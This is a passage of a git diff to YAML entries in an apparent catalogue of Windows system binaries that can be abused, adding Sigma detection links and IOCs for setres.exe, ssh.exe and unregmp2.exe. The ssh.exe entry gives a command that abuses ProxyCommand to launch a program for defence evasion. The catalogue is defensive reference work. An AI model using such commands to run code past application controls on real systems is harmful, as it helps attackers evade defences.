+  - IOC: Existence of runexewithargs_output.txt file
+Resources:
+  - Link: https://twitter.com/0gtweet/status/1206692239839289344
+Acknowledgement:
+  - Person: Grzegorz Tworek
+    Handle: '@0gtweet'
--- a/yml/OSBinaries/Setres.yml
+++ b/yml/OSBinaries/Setres.yml
@@ -14,6 +14,7 @@ Commands:
 Full_Path:
  - Path: c:\windows\system32\setres.exe
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml
  - IOC: Unusual location for choice.exe file
  - IOC: Process created from choice.com binary
  - IOC: Existence of choice.cmd file
--- a/yml/OSBinaries/Ssh.yml
+++ b/yml/OSBinaries/Ssh.yml
@@ -1,4 +1,3 @@
---
 Name: ssh.exe
 Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
 Author: 'Akshat Pradhan'
@@ -11,17 +10,21 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10 1809, Windows Server 2019
-  - Command: ssh localhost calc.exe
-    Description: Executes calc.exe.
-    Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
-    Category: AWL Bypass
+  - Command: ssh -o ProxyCommand=calc.exe .
+    Description: Executes calc.exe from ssh.exe
+    Usecase: Performs execution of specified file, can be used as a defensive evasion.
+    Category: Execute
    Privileges: User
-    MitreID: T1218
-    OperatingSystem: Windows 10 1809, Windows Server 2019
+    MitreID: T1202
+    OperatingSystem: Windows 10
 Full_Path:
  - Path: c:\windows\system32\OpenSSH\ssh.exe
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml
  - IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
  - IOC: command line arguments specifying execution.
+Resources:
+  - Link: https://gtfobins.github.io/gtfobins/ssh/
 Acknowledgement:
  - Person: Akshat Pradhan
+  - Person: Felix Boulet
--- a/yml/OSBinaries/Unregmp2.yml
+++ b/yml/OSBinaries/Unregmp2.yml
@@ -15,6 +15,7 @@ Full_Path:
  - Path: C:\Windows\System32\unregmp2.exe
  - Path: C:\Windows\SysWOW64\unregmp2.exe
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml
  - IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`
 Resources:
  - Link: https://twitter.com/notwhickey/status/1466588365336293385